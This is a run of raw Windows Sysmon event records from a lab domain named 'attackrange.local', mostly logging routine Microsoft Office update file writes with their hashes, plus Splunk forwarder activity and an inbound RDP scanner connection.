14:55:36.038{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A83B21B3FAF4C356820868E9521CCE7,SHA256=78F8DA2CE401A7F9975883C4396C3ADCE89E25437E535E0933A6314D83F9E25C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070383Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:37.985{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\WordCombinedFloatieModel.binMD5=2031DE7AB45FE9F3514DBD6BA3A4F7EC,SHA256=6461C04DED231AA45A856A6C2258B581F7FB19CA2612179CE4053B72E95C1AFC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070382Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:37.985{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\WordCombinedFloatieLreModel.onnxMD5=6825DFB5B1E7FF6182047AF87FFA8F03,SHA256=E6828DA9F8B324DB9629C791FA1CDCC3F0CEA2DB5E219F12DCBD59CFC6336DDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070381Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:37.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\WordCombinedFloatieGruModel.onnxMD5=B868EF6FF7D64FF5B1281F90C517A79C,SHA256=A25E3C9BFBEB90C9E04B68C838CDABC689BA1B147D1A28EE62DC510AB9732779,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070380Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:37.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Wordcnvr.dllMD5=0F4318CCF9AC53EA26DD57A7F5F088C4,SHA256=02CD698A5DB45877EA43B3A758467C2272EF4987B0B7C913F7CBE769134232BD,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070379Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:37.907{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Wordcnvpxy.cnvMD5=C2E785F9F1CC05A941F42A3F66E75DD4,SHA256=7278C5A3A42863CBEDC30ECCFE49FC61650DDDA9687BE37E4AB8B74D248FCE7C,IMPHASH=9ECD71B706546AF3A2B6AA518318C991truetrue 23542300x800000000000000070378Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:37.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Wordcnv.dllMD5=DFDEF5FF2ABB76E416A4006DFB2071C0,SHA256=CCB9C77B38869BEF5599AC34536FEAA49092784E907B80CB5A7CA601963DD311,IMPHASH=112C0BE5F05DDBFF5F5CC22C22455423truetrue 23542300x800000000000000070377Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:37.892{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=06F49D38312EADF6E3A7BF0AC21326F2,SHA256=07C23761B1C516D049DB9AB34F81F40DE30E831CA2E2FAB23F4EF604D1218D45,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000070376Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:36.220{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com64436-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000070375Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:37.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\WINWORD.VisualElementsManifest.xmlMD5=11D9E526D4E1C06BE18795CEBC14B8E8,SHA256=3BFE25F1B95D97AD0221922C6669DC478DDD95EA4AB551C9D72BC3D629FC1E18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070374Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:37.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\WINWORD.EXEMD5=7E80F06792295190F29B609379BE1026,SHA256=5BDD59936879907030D50DAFD31BF8FC663D9878955A92A479458DBE8F748B3D,IMPHASH=21DECB0B7EE3F890B1FF9B6C42996CAEtruetrue 23542300x800000000000000070373Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:37.735{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\windowsspeakerrecosdk.dllMD5=D7AA48F1CECB2551AB52F02420301E8F,SHA256=C8A19927C73527AF0582DC31EAD021CE9F7CE0B4808801FC79A20E17B0466991,IMPHASH=9DDDAB09D28460F8FCA0A532CA00BF74truetrue 23542300x800000000000000070372Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:37.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Win32MsgQueue.dllMD5=B61053668DDF4B3E705AB8D5C3998F9F,SHA256=600D1B1A80F92BCDDFEE14595A3988C8D51BECE7222B0FAFF2F8C3EF086EE78C,IMPHASH=B5B97B34494503AD5932BDEE03C5F70Atruetrue 23542300x800000000000000070371Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:37.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\WebView2Loader.dllMD5=F2993795F0A64C5FC624BACA596F7D28,SHA256=44871F3E528B506C71801B75EBADB75E1F567130EEC2CF76FCA85C013CABEA31,IMPHASH=F5FAC480BB228E11964A3D517FA41CE0truetrue 23542300x800000000000000070370Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:37.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\WEBSANDBOX.DLLMD5=546C16E95E45432C3C79A5360242E19C,SHA256=FB8A24A8000A6A681E26EA4675403796F2305D9722364CA31E06EC5036B3E138,IMPHASH=554104375790E9B5A57EEE244956C106truetrue 23542300x800000000000000070369Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:37.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\VVIEWER.DLLMD5=5F080198CB54BBE2BF192E3683A7B768,SHA256=4D7E36B8BE11C8385F9E495F011524E259BFCC62903097D36A59916917B4B92F,IMPHASH=7243B76BC3F8BD1910713CA64A891D69truetrue 23542300x800000000000000070368Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:37.532{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\VVIEWDWG.DLLMD5=C2C3F8E7B6BE0A0277CAB785CB265B89,SHA256=BCBB61F76C1B3187CACFCE98B810FC2BA04A0CC6F5C262C284CA6C521DC5321A,IMPHASH=7E9E1C9C2095E83D9CABD87844C4E568truetrue 23542300x800000000000000070367Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:37.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\VPREVIEW.EXEMD5=7F462C6C56652BC283D39FEAF3A92608,SHA256=EEB614A6808450D3410C03F8732090AEB373A8904316D7BC824FEC27476129CC,IMPHASH=1FCDDB716DBA6A0EF2BB9BB7B948CFE0truetrue 23542300x800000000000000070366Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:37.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\VISSHE.DLLMD5=E6A44F323819806311C6087121189988,SHA256=4AFD6DC838124C4624784F17E3199ACB7B6BA88473AE915CEC1FE0756A5B08B1,IMPHASH=5622310C974924E76DE7D24DAD6B4F1Atruetrue 23542300x800000000000000070365Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:37.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\VCRUNTIME140_APP.DLLMD5=92C768E88976CD8B9AA74575D442A1BE,SHA256=57898AC402F716883F0977CB6940C7752F0C6F833D13082D74399A9C084DA659,IMPHASH=C33ED74D88F3C03CE8DCE4AB589DD28Etruetrue 23542300x800000000000000070364Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:37.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\vcruntime140_1.dllMD5=9040ED0FDF4CE7558CBFFB73D4C17761,SHA256=6CC4315DACEB0522816C60678344466CB452426267F70C7FAAE925361674E774,IMPHASH=AE0BDE6314FA2027B54CE04898F6AB69truetrue 23542300x800000000000000070363Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:37.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\vcruntime140.dllMD5=23105A395B807D9335219958B4D0CEC1,SHA256=61832990E364DCA5BFA2C61D930F00ACAAE6D1AAA3130392403455AE9A1125A5,IMPHASH=F143E2868EFDE0FCB493BD3051708A62truetrue 23542300x800000000000000070362Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:37.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\VCCORLIB140_APP.DLLMD5=0794587D908DE9A5EE3F40DB0C8775A1,SHA256=0E7DAB2E793BFB281494B4A67802B21795F96C138BE043C6276B811213221FAC,IMPHASH=D83358D1708F2252F92437461E0568DEtruetrue 23542300x800000000000000070361Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:37.407{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\vccorlib140.dllMD5=DDD9457EF184CC3897B8198D262F4339,SHA256=41B6AF9484C860804C69E00C9D7FEE22EFE5F769C51355936FC9DE248221DE94,IMPHASH=4A5F3C3AA39A4E0497DFF0471239D5F9truetrue 23542300x800000000000000070360Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:37.407{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\v8jsi.dllMD5=5306E840134679463533DD0836E5B0D1,SHA256=A3C427C76953482FD05E90E5E2781B8EF80F95617435449688B4D278B2955AA3,IMPHASH=1CFD049F9F2B0C7D3960A3CEBFD90B67truetrue 23542300x800000000000000070359Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:37.282{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\URLREDIR.DLLMD5=E11BC008FA716AE9986771CE3EFFF5FD,SHA256=876B6B383CE9B845E3AB0B45F3AED64F2ECFE187054977B1E18152D9876E92EB,IMPHASH=CB0A9654FED37ED8485D5FB044DA73D4truetrue 23542300x800000000000000070358Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:37.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\upe.dllMD5=5B39C4F7D608FBC27BD3250800FBE306,SHA256=12FF01991666D969B5BA10DBAE87CA79FA027A60475B1C40DB9D7F28E79E937A,IMPHASH=6AED618F629FF7545252CD0835D75FB5truetrue 23542300x800000000000000070357Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:37.251{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\UCRTBASE.DLLMD5=ED27C615D14DADBE15581E8CB7ABBE1C,SHA256=1CA33187B0E81CD0B181A554718CAFFF2D17C3F6795E6E0824F844ABFBADDC07,IMPHASH=5E97252FEC9CAEB9BB1DDC7CC50F68A6truetrue 23542300x800000000000000070356Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:37.235{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Ucmp.dllMD5=6ED152673C0C0C283FB2BAB8943B2972,SHA256=A39DA726736611943782B48239DA7BB8AAFFC8906EF3895E261F4F9C753236B0,IMPHASH=07EBD435E7754233F04599ACEFF8C9B2truetrue 23542300x800000000000000070355Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:37.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\UCMAPI.EXE.MANIFESTMD5=BF93701BCBE8995415497B6595691553,SHA256=195CC7D7378939BEE7C1F2E979DC2F68926E8AB1A5724766B3F1BF54AC130791,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070354Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:37.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\UcMapi.exeMD5=0E4460E35AA2D5F4147AD4B124552A01,SHA256=D14643984EA8849BF49B2F043E543A3E06E485A6EB72266C15F39C3F74BBDE5C,IMPHASH=ED22CB2413C4F4AF1E51F9B7913DB4A5truetrue 23542300x800000000000000070353Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:37.157{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\UccApi.dllMD5=2B3AC474531B87863BC248731142A110,SHA256=4C87E13A202B95C42105A930BAD3487D266B0FD2304B937CE7F1E080E7F78FDD,IMPHASH=9074AE762CF4026CCF16EEFDD1C6314Ctruetrue 23542300x800000000000000070352Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:37.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\UCAddin.dllMD5=CCA68725B76182147F955DF0792235AC,SHA256=0EA633713F4F8E3D08C84F20E1C8F450606C1B59597DAF7C95511754F03CC477,IMPHASH=F91FF33F387CAD6E5568F79A708DB945truetrue 23542300x800000000000000070351Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:37.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Uc.dllMD5=CE0D375F787452B711F72A1D2E9BA1A2,SHA256=62B8F8F0240D1F606FA0763099E4825EC70C9EC9B679E7A74C2511E54E302E26,IMPHASH=08468843D6EEE33F9EE6A353C02B5F20truetrue 354300x800000000000000049789Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:34.834{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52501-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000049788Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:37.054{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=375FD13CAD5ED5249DC74A2AC67355A0,SHA256=64387CCCDDB5F787283B9D054DB8FFB0736749EFED6DDB87BA738415AED1D57A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070492Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.985{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\Access\DataType\Tags.accftMD5=01B027BAA855AB888E527F93F2863293,SHA256=46179DA7C540712F07BD76F23CE01D3C2D0D0CD47F648CDD333FC33780EBD6A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070491Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.985{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\Access\DataType\Status.accftMD5=82C794D5773C237DFAB0F2BE801EC3F5,SHA256=92DA93F4A6B7DBCA5E5C46CB7266E13F7226932AD83B8C5E3A82BA4A7BF41BEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070490Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.985{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\Access\DataType\Start End Dates.accftMD5=27EAC5F6A50A2BBFFF9880BA343ABC99,SHA256=BAAD159112615BFC0BB7673CA0B408587242ACA634A77286F01169E3C4A7F30A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070489Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.985{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\Access\DataType\Priority.accftMD5=996E04449FA17E5CAEA467DBF41E1169,SHA256=E91D88FF10B8A6288792E44360C141E5870FBD94E5F8F616488508B96BDD7BCA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070488Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.985{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\Access\DataType\Phone.accftMD5=A9BB8AF495C55E78258EC92FC8C0C664,SHA256=25CF81D2BCF4B3EA18407AA04DB576889BADB302206B33B96E1BC529AA9FFD26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070487Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.985{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\Access\DataType\Payment Type.accftMD5=872A01D4C9E0EC68C4EB5D62A6B4E039,SHA256=3F3CDA238E2D052048C0065F5C5C5E6BDFEDBC066270A44770F7A7E042044A4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070486Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.985{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\Access\DataType\Name.accftMD5=5435D0E28DDFAA4F6E447D756AD6DFA4,SHA256=53B8B962BD8ED494622F6AF83CE41B1ED2CDDC6C2960F58176592A4054C57A3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070485Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.985{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\Access\DataType\Category.accftMD5=47548D91CE30E783111E36764DA037DC,SHA256=95D0F140D7CF07521B177E9DB9702F4EF1B1B1065B7A5C28E5CA6D768F43EE79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070484Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.985{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\Access\DataType\Address.accftMD5=D251E345D39887F1136186AC0564FBA4,SHA256=47922D0A77275B887D9FE45076907150B89E599C936706684F7F871402813E27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070483Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:38.985{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Stationery\1033\TECHTOOL.HTMMD5=CF3DADFE83C8241F4A8D6344C2E5C407,SHA256=94F3CD01D4DB699A399B64FB2609F65A35A04734860BB55D3690665EEDCB0B5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070482Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 